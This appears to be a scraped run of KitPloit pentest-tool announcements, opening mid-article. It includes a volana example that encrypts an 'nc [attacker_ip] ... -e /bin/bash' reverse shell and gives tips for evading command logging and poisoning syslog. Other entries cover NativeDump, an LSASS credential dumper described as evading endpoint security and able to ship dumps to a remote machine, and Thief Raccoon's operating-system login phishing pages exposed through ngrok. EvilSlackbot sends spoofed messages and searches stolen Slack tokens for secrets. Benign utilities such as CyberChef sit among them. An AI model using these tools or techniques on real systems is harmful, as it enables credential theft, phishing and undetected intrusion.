    ## Transfer it on TARGET (the unique detectable command)
    ## [...]

    ## Encrypt the command you want to stealthy execute
    ## (Here a nc bindshell to obtain a interactive shell)
    volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
    >>> ENCRYPTED COMMAND

    Copy encrypted command and executed it with your rce on target machine

    ./volana decr [encrypted_command]
    ## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

    Why not just hide command with echo [command] | base64 ? And decode on target with echo [encoded_command] | base64 -d | bash

    Because we want to be protected against systems that trigger alert for base64 use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.

    Detection

    Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

    By detected we mean if we are able to trigger an alert if a certain command has been executed.

    Hide from

    Only the volana launching command line will be catched. 🧠 However, by adding a space before executing it, the default bash behavior is to not save it

    • Detection systems that are based on history command output
    • Detection systems that are based on history files
    • .bash_history, ".zsh_history" etc ..
    • Detection systems that are based on bash debug traps
    • Detection systems that are based on sudo built-in logging system
    • Detection systems tracing all processes syscall system-wide (eg opensnoop)
    • Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec, etc..)
    • Easy to detect & avoid: pkill -9 script
    • Not a common case
    • screen is a bit more difficult to avoid, however it does not register input (secret input: stty -echo => avoid)
    • Command detection Could be avoid with volana with encryption

    Visible for

    • Detection systems that have alert for unknown command (volana one)
    • Detection systems that are based on keylogger
    • Easy to avoid: copy/past commands
    • Not a common case
    • Detection systems that are based on syslog files (e.g. /var/log/auth.log)
    • Only for sudo or su commands
    • syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
    • Detection systems that are based on syscall (eg auditd,LKML/eBPF)
    • Difficult to analyze, could be make unreadable by making several diversion syscalls
    • Custom LD_PRELOAD injection to make log
    • Not a common case at all

    Bug bounty

    Sorry for the clickbait title, but no money will be provided for contibutors. πŸ›

    Let me know if you have found: * a way to detect volana * a way to spy console that don't detect volana commands * a way to avoid a detection system

    Report here

    Credit



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    CyberChef - The Cyber Swiss Army Knife - A Web App For Encryption, Encoding, Compression And Data Analysis

    By: Zion3R β€” June 18th 2024 at 12:30


    CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

    The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years.


    Live demo

    CyberChef is still under active development. As a result, it shouldn't be considered a finished product. There is still testing and bug fixing to do, new features to be added and additional documentation to write. Please contribute!

    Cryptographic operations in CyberChef should not be relied upon to provide security in any situation. No guarantee is offered for their correctness.

    A live demo can be found here - have fun!

    Containers

    If you would like to try out CyberChef locally you can either build it yourself:

    docker build --tag cyberchef --ulimit nofile=10000 .
    docker run -it -p 8080:80 cyberchef

    Or you can use our image directly:

    docker run -it -p 8080:80 ghcr.io/gchq/cyberchef:latest

    This image is built and published through our GitHub Workflows

    How it works

    There are four main areas in CyberChef:

    1. The input box in the top right, where you can paste, type or drag the text or file you want to operate on.
    2. The output box in the bottom right, where the outcome of your processing will be displayed.
    3. The operations list on the far left, where you can find all the operations that CyberChef is capable of in categorised lists, or by searching.
    4. The recipe area in the middle, where you can drag the operations that you want to use and specify arguments and options.

    You can use as many operations as you like in simple or complex ways. Some examples are as follows:

    Features

    • Drag and drop
      • Operations can be dragged in and out of the recipe list, or reorganised.
      • Files up to 2GB can be dragged over the input box to load them directly into the browser.
    • Auto Bake
      • Whenever you modify the input or the recipe, CyberChef will automatically "bake" for you and produce the output immediately.
      • This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
    • Automated encoding detection
      • CyberChef uses a number of techniques to attempt to automatically detect which encodings your data is under. If it finds a suitable operation that make sense of your data, it displays the 'magic' icon in the Output field which you can click to decode your data.
    • Breakpoints
      • You can set breakpoints on any operation in your recipe to pause execution before running it.
      • You can also step through the recipe one operation at a time to see what the data looks like at each stage.
    • Save and load recipes
      • If you come up with an awesome recipe that you know you'll want to use again, just click "Save recipe" and add it to your local storage. It'll be waiting for you next time you visit CyberChef.
      • You can also copy the URL, which includes your recipe and input, to easily share it with others.
    • Search
      • If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
    • Highlighting
    • Save to file and load from file
      • You can save the output to a file at any time or load a file by dragging and dropping it into the input field. Files up to around 2GB are supported (depending on your browser), however, some operations may take a very long time to run over this much data.
    • CyberChef is entirely client-side
      • It should be noted that none of your recipe configuration or input (either text or files) is ever sent to the CyberChef web server - all processing is carried out within your browser, on your own computer.
      • Due to this feature, CyberChef can be downloaded and run locally. You can use the link in the top left corner of the app to download a full copy of CyberChef and drop it into a virtual machine, share it with other people, or host it in a closed network.

    Deep linking

    By manipulating CyberChef's URL hash, you can change the initial settings with which the page opens. The format is https://gchq.github.io/CyberChef/#recipe=Operation()&input=...

    Supported arguments are recipe, input (encoded in Base64), and theme.

    Browser support

    CyberChef is built to support

    • Google Chrome 50+
    • Mozilla Firefox 38+

    Node.js support

    CyberChef is built to fully support Node.js v16. For more information, see the "Node API" wiki page

    Contributing

    Contributing a new operation to CyberChef is super easy! The quickstart script will walk you through the process. If you can write basic JavaScript, you can write a CyberChef operation.

    An installation walkthrough, how-to guides for adding new operations and themes, descriptions of the repository structure, available data types and coding conventions can all be found in the "Contributing" wiki page.

    • Push your changes to your fork.
    • Submit a pull request. If you are doing this for the first time, you will be prompted to sign the GCHQ Contributor Licence Agreement via the CLA assistant on the pull request. This will also ask whether you are happy for GCHQ to contact you about a token of thanks for your contribution, or about job opportunities at GCHQ.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

    By: Zion3R β€” June 16th 2024 at 17:16


    NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).


    • NTOpenProcessToken and NtAdjustPrivilegeToken to get the "SeDebugPrivilege" privilege
    • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
    • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
    • NtOpenProcess to get a handle for the lsass process
    • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

    Usage:

    NativeDump.exe [DUMP_FILE]

    The default file name is "proc_.dmp":

    The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

    Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine

    The project has three branches at the moment (apart from the main branch with the basic technique):

    • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

    • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

    • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


    Technique in detail: Creating a minimal Minidump file

    After reading Minidump undocumented structures, its structure can be summed up to:

    • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
    • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
    • Streams: Every stream contains different information related to the process and has its own format
    • Regions: The actual bytes from the process from each memory region which can be read

    I created a parsing tool which can be helpful: MinidumpParser.

    We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


    A. Header

    The header is a 32-bytes structure which can be defined in C# as:

    public struct MinidumpHeader
    {
    public uint Signature;
    public ushort Version;
    public ushort ImplementationVersion;
    public ushort NumberOfStreams;
    public uint StreamDirectoryRva;
    public uint CheckSum;
    public IntPtr TimeDateStamp;
    }

    The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header


    B. Stream Directory

    Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:

    public struct MinidumpStreamDirectoryEntry
    {
    public uint StreamType;
    public uint Size;
    public uint Location;
    }

    The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

    ID Stream Type
    0x00 UnusedStream
    0x01 ReservedStream0
    0x02 ReservedStream1
    0x03 ThreadListStream
    0x04 ModuleListStream
    0x05 MemoryListStream
    0x06 ExceptionStream
    0x07 SystemInfoStream
    0x08 ThreadExListStream
    0x09 Memory64ListStream
    0x0A CommentStreamA
    0x0B CommentStreamW
    0x0C HandleDataStream
    0x0D FunctionTableStream
    0x0E UnloadedModuleListStream
    0x0F MiscInfoStream
    0x10 MemoryInfoListStream
    0x11 ThreadInfoListStream
    0x12 HandleOperationListStream
    0x13 TokenStream
    0x16 HandleOperationListStream

    C. SystemInformation Stream

    First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

    public struct SystemInformationStream
    {
    public ushort ProcessorArchitecture;
    public ushort ProcessorLevel;
    public ushort ProcessorRevision;
    public byte NumberOfProcessors;
    public byte ProductType;
    public uint MajorVersion;
    public uint MinorVersion;
    public uint BuildNumber;
    public uint PlatformId;
    public uint UnknownField1;
    public uint UnknownField2;
    public IntPtr ProcessorFeatures;
    public IntPtr ProcessorFeatures2;
    public uint UnknownField3;
    public ushort UnknownField14;
    public byte UnknownField15;
    }

    The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)


    D. ModuleList Stream

    Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".

    The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

    public struct ModuleListStream
    {
    public uint NumberOfModules;
    public ModuleInfo[] Modules;
    }

    As there is only one, it gets simplified to:

    public struct ModuleListStream
    {
    public uint NumberOfModules;
    public IntPtr BaseAddress;
    public uint Size;
    public uint UnknownField1;
    public uint Timestamp;
    public uint PointerName;
    public IntPtr UnknownField2;
    public IntPtr UnknownField3;
    public IntPtr UnknownField4;
    public IntPtr UnknownField5;
    public IntPtr UnknownField6;
    public IntPtr UnknownField7;
    public IntPtr UnknownField8;
    public IntPtr UnknownField9;
    public IntPtr UnknownField10;
    public IntPtr UnknownField11;
    }

    The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)


    E. Memory64List Stream

    Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.

    public struct Memory64ListStream
    {
    public ulong NumberOfEntries;
    public uint MemoryRegionsBaseAddress;
    public Memory64Info[] MemoryInfoEntries;
    }

    Each module entry is a 16-bytes structure:

    public struct Memory64Info
    {
    public IntPtr Address;
    public IntPtr Size;
    }

    The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them


    F. Looping memory regions

    There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:

    1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivilege, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
    2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
    3. Open a process handle. Use ntdll!OpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

    With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream


    G. Creating Minidump file

    After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.




    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Sttr - Cross-Platform, Cli App To Perform Various Operations On String

    By: Zion3R β€” June 8th 2024 at 12:30


    sttr is command line software that allows you to quickly run various transformation operations on the string.


    // With input prompt
    sttr

    // Direct input
    sttr md5 "Hello World"

    // File input
    sttr md5 file.text
    sttr base64-encode image.jpg

    // Reading from different processor like cat, curl, printf etc..
    echo "Hello World" | sttr md5
    cat file.txt | sttr md5

    // Writing output to a file
    sttr yaml-json file.yaml > file-output.json

    :movie_camera: Demo

    :battery: Installation

    Quick install

    You can run the below curl to install it somewhere in your PATH for easy use. Ideally it will be installed at ./bin folder

    curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh

    Webi

    MacOS / Linux

    curl -sS https://webi.sh/sttr | sh

    Windows

    curl.exe https://webi.ms/sttr | powershell

    See here

    Homebrew

    If you are on macOS and using Homebrew, you can install sttr with the following:

    brew tap abhimanyu003/sttr
    brew install sttr

    Snap

    sudo snap install sttr

    Arch Linux

    yay -S sttr-bin

    Scoop

    scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
    scoop install sttr

    Go

    go install github.com/abhimanyu003/sttr@latest

    Manually

    Download the pre-compiled binaries from the Release! page and copy them to the desired location.

    :books: Guide

    • After installation simply run sttr command.
    // For interactive menu
    sttr
    // Provide your input
    // Press two enter to open operation menu
    // Press `/` to filter various operations.
    // Can also press UP-Down arrows select various operations.
    • Working with help.
    sttr -h

    // Example
    sttr zeropad -h
    sttr md5 -h
    • Working with files input.
    sttr {command-name} {filename}

    sttr base64-encode image.jpg
    sttr md5 file.txt
    sttr md-html Readme.md
    • Writing output to file.
    sttr yaml-json file.yaml > file-output.json
    • Taking input from other command.
    curl https: //jsonplaceholder.typicode.com/users | sttr json-yaml
    • Chaining the different processor.
    sttr md5 hello | sttr base64-encode

    echo "Hello World" | sttr base64-encode | sttr md5

    :boom: Supported Operations

    Encode/Decode

    • [x] ascii85-encode - Encode your text to ascii85
    • [x] ascii85-decode - Decode your ascii85 text
    • [x] base32-decode - Decode your base32 text
    • [x] base32-encode - Encode your text to base32
    • [x] base64-decode - Decode your base64 text
    • [x] base64-encode - Encode your text to base64
    • [x] base85-encode - Encode your text to base85
    • [x] base85-decode - Decode your base85 text
    • [x] base64url-decode - Decode your base64 url
    • [x] base64url-encode - Encode your text to url
    • [x] html-decode - Unescape your HTML
    • [x] html-encode - Escape your HTML
    • [x] rot13-encode - Encode your text to ROT13
    • [x] url-decode - Decode URL entities
    • [x] url-encode - Encode URL entities

    Hash

    • [x] bcrypt - Get the Bcrypt hash of your text
    • [x] md5 - Get the MD5 checksum of your text
    • [x] sha1 - Get the SHA1 checksum of your text
    • [x] sha256 - Get the SHA256 checksum of your text
    • [x] sha512 - Get the SHA512 checksum of your text

    String

    • [x] camel - Transform your text to CamelCase
    • [x] kebab - Transform your text to kebab-case
    • [x] lower - Transform your text to lower case
    • [x] reverse - Reverse Text ( txeT esreveR )
    • [x] slug - Transform your text to slug-case
    • [x] snake - Transform your text to snake_case
    • [x] title - Transform your text to Title Case
    • [x] upper - Transform your text to UPPER CASE

    Lines

    • [x] count-lines - Count the number of lines in your text
    • [x] reverse-lines - Reverse lines
    • [x] shuffle-lines - Shuffle lines randomly
    • [x] sort-lines - Sort lines alphabetically
    • [x] unique-lines - Get unique lines from list

    Spaces

    • [x] remove-spaces - Remove all spaces + new lines
    • [x] remove-newlines - Remove all new lines

    Count

    • [x] count-chars - Find the length of your text (including spaces)
    • [x] count-lines - Count the number of lines in your text
    • [x] count-words - Count the number of words in your text

    RGB/Hex

    • [x] hex-rgb - Convert a #hex-color code to RGB
    • [x] hex-encode - Encode your text Hex
    • [x] hex-decode - Convert Hexadecimal to String

    JSON

    • [x] json - Format your text as JSON
    • [x] json-escape - JSON Escape
    • [x] json-unescape - JSON Unescape
    • [x] json-yaml - Convert JSON to YAML text
    • [x] json-msgpack - Convert JSON to MSGPACK
    • [x] msgpack-json - Convert MSGPACK to JSON

    YAML

    • [x] yaml-json - Convert YAML to JSON text

    Markdown

    • [x] markdown-html - Convert Markdown to HTML

    Extract

    • [x] extract-emails - Extract emails from given text
    • [x] extract-ip - Extract IPv4 and IPv6 from your text
    • [x] extract-urls - Extract URls your text ( we don't do ping check )

    Other

    • [x] escape-quotes - escape single and double quotes from your text
    • [x] completion - generate the autocompletion script for the specified shell
    • [x] interactive - Use sttr in interactive mode
    • [x] version - Print the version of sttr
    • [x] zeropad - Pad a number with zeros
    • [x] and adding more....

    Featured On

    These are the few locations where sttr was highlighted, many thanks to all of you. Please feel free to add any blogs/videos you may have made that discuss sttr to the list.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    PIP-INTEL - OSINT and Cyber Intelligence Tool

    By: Zion3R β€” June 7th 2024 at 12:30

    Β 


    Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface simplifying the data collection and analysis processes for researchers and cybersecurity professionals.

    Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.




    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Thief Raccoon - Login Phishing Tool

    By: Zion3R β€” June 6th 2024 at 12:30


    Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.


    Features

    • Phishing simulation for Windows 10, Windows 11, Windows XP, Windows Server, Ubuntu, Ubuntu Server, and macOS.
    • Capture user credentials for educational demonstrations.
    • Customizable login screens that mimic real operating systems.
    • Full-screen mode to enhance the phishing simulation.

    Installation

    Prerequisites

    • Python 3.x
    • pip (Python package installer)
    • ngrok (for exposing the local server to the internet)

    Download and Install

    1. Clone the repository:

    ```bash git clone https://github.com/davenisc/thief_raccoon.git cd thief_raccoon

    1. Install python venv

    ```bash apt install python3.11-venv

    1. Create venv:

    ```bash python -m venv raccoon_venv source raccoon_venv/bin/activate

    1. Install the required libraries:

    ```bash pip install -r requirements.txt

    Usage

    1. Run the main script:

    ```bash python app.py

    1. Select the operating system for the phishing simulation:

    After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.

    1. Access the phishing page:

    If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.

    If you want to make the phishing page accessible over the internet, use ngrok.

    Using ngrok

    1. Download and install ngrok

    Download ngrok from ngrok.com and follow the installation instructions for your operating system.

    1. Expose your local server to the internet:

    2. Get the public URL:

    After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.

    How to install Ngrok on Linux?

    1. Install ngrok via Apt with the following command:

    ```bash curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok

    1. Run the following command to add your authtoken to the default ngrok.yml

    ```bash ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx

    Deploy your app online

    1. Put your app online at ephemeral domain Forwarding to your upstream service. For example, if it is listening on port http://localhost:8080, run:

      ```bash ngrok http http://localhost:5000

    Example

    1. Run the main script:

    ```bash python app.py

    1. Select Windows 11 from the menu:

    ```bash Select the operating system for phishing: 1. Windows 10 2. Windows 11 3. Windows XP 4. Windows Server 5. Ubuntu 6. Ubuntu Server 7. macOS Enter the number of your choice: 2

    1. Access the phishing page:

    Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.

    Disclaimer

    This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.

    License

    This project is licensed under the MIT License. See the LICENSE file for details.

    ScreenShots

    Credits

    Developer: @davenisc Web: https://davenisc.com



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    X-Recon - A Utility For Detecting Webpage Inputs And Conducting XSS Scans

    By: Zion3R β€” June 5th 2024 at 12:30

    A utility for identifying web page inputs and conducting XSS scanning.


    Features:

    • Subdomain Discovery:
    • Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.

    • Site-wide Link Discovery:

    • Collects all links throughout the website based on the provided whitelist and the specified max_depth.

    • Form and Input Extraction:

    • Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.

    • XSS Scanning:

    • Once the start recon option returns a custom JSON containing the extracted entries, the X-Recon tool can initiate the XSS vulnerability testing process and furnish you with the desired results!



    Note:

    The scanning functionality is currently inactive on SPA (Single Page Application) web applications, and we have only tested it on websites developed with PHP, yielding remarkable results. In the future, we plan to incorporate these features into the tool.




    Note:

    This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (".css",".js",".mp4",".zip","png",".svg",".jpeg",".webp",".jpg",".gif"). You can customize this list to better suit your needs by editing the setting.json file..

    Installation

    $ git clone https://github.com/joshkar/X-Recon
    $ cd X-Recon
    $ python3 -m pip install -r requirements.txt
    $ python3 xr.py

    Target For Test:

    You can use this address in the Get URL section

      http://testphp.vulnweb.com


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

    By: Zion3R β€” June 4th 2024 at 12:30


    ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


    Features

    • Identifies potential ROP gadgets in binary executables.
    • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
    • Generates exploit templates to make the exploit process faster
    • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
    • Can print function names and addresses for further analysis.
    • Supports searching for specific instruction patterns.

    Usage

    • <binary>: Path to the binary file for analysis.
    • -s, --search SEARCH: Optional. Search for specific instruction patterns.
    • -f, --functions: Optional. Print function names and addresses.

    Examples

    • Analyze a binary without searching for specific instructions:

    python3 ropdump.py /path/to/binary

    • Analyze a binary and search for specific instructions:

    python3 ropdump.py /path/to/binary -s "pop eax"

    • Analyze a binary and print function names and addresses:

    python3 ropdump.py /path/to/binary -f



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Startup-SBOM - A Tool To Reverse Engineer And Inspect The RPM And APT Databases To List All The Packages Along With Executables, Service And Versions

    By: Zion3R β€” June 3rd 2024 at 12:30


    This is a simple SBOM utility which aims to provide an insider view on which packages are getting executed.

    The process and objective is simple we can get a clear perspective view on the packages installed by APT (currently working on implementing this for RPM and other package managers). This is mainly needed to check which all packages are actually being executed.


    Installation

    The packages needed are mentioned in the requirements.txt file and can be installed using pip:

    pip3 install -r requirements.txt

    Usage

    • First of all install the packages.
    • Secondly , you need to set up environment variables such as:
      • Mount the image: Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes but its still quite a task for me.
    • Finally run the tool to list all the packages.
    Argument Description
    --analysis-mode Specifies the mode of operation. Default is static. Choices are static and chroot.
    --static-type Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service.
    --volume-path Specifies the path to the mounted volume. Default is /mnt.
    --save-file Specifies the output file for JSON output.
    --info-graphic Specifies whether to generate visual plots for CHROOT analysis. Default is True.
    --pkg-mgr Manually specify the package manager or dont add this option for automatic check.
    APT:
    - Static Info Analysis:
    - This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
    - It analyzes the packages installed on the mounted volume located at /mnt.
    - It saves the output in a JSON file named output.json.
    - It generates visual plots for CHROOT analysis.
    ```bash
    python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
    ```
    • Static Service Analysis:

    • This command runs the program in static analysis mode, specifically using the Service file analysis method.

    • It analyzes the packages installed on the mounted volume located at /custom_mount.
    • It saves the output in a JSON file named output.json.
    • It does not generate visual plots for CHROOT analysis. bash python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False

    • Chroot analysis with or without Graphic output:

    • This command runs the program in chroot analysis mode.
    • It analyzes the packages installed on the mounted volume located at /mnt.
    • It saves the output in a JSON file named output.json.
    • It generates visual plots for CHROOT analysis.
    • For graphical output keep --info-graphic as True else False bash python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False

    RPM - Static Analysis: - Similar to how its done on apt but there is only one type of static scan avaialable for now. bash python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json

    • Chroot analysis with or without Graphic output:
    • Exactly how its done on apt. bash python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False

    Supporting Images

    Currently the tool works on Debian and Red Hat based images I can guarentee the debian outputs but the Red-Hat onces still needs work to be done its not perfect.

    I am working on the pacman side of things I am trying to find a relaiable way of accessing the pacman db for static analysis.

    Graphical Output Images (Chroot)

    APT Chroot

    RPM Chroot

    Inner Workings

    For the workings and process related documentation please read the wiki page: Link

    TODO

    • [x] Support for RPM
    • [x] Support for APT
    • [x] Support for Chroot Analysis
    • [x] Support for Versions
    • [x] Support for Chroot Graphical output
    • [x] Support for organized graphical output
    • [ ] Support for Pacman

    Ideas and Discussions

    Ideas regarding this topic are welcome in the discussions page.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

    By: Zion3R β€” June 2nd 2024 at 12:30

    EvilSlackbot

    A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

    Disclaimer

    This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.


    Background

    Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an api token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, files, and search for secrets leaked in slack.

    Phishing Simulations

    In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)

    Installation

    EvilSlackbot requires python3 and Slackclient

    pip3 install slackclient

    Usage

    usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
    [-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]

    options:
    -h, --help show this help message and exit

    Required:
    -t TOKEN, --token TOKEN
    Slack Oauth token

    Attacks:
    -sP, --spoof Spoof a Slack message, customizing your name, icon, etc
    (Requires -e,-eL, or -cH)
    -m, --message Send a message as the bot associated with your token
    (Requires -e,-eL, or -cH)
    -s, --search Search slack for secrets with a keyword
    -a, --attach Send a message containing a malicious attachment (Requires -f
    and -e,-eL, or -cH)

    Arguments:
    -f FILE, --file FILE Path to file attachment
    -e EMAIL, --email EMAIL
    Email of target
    -cH CHANNEL, --channel CHANNEL
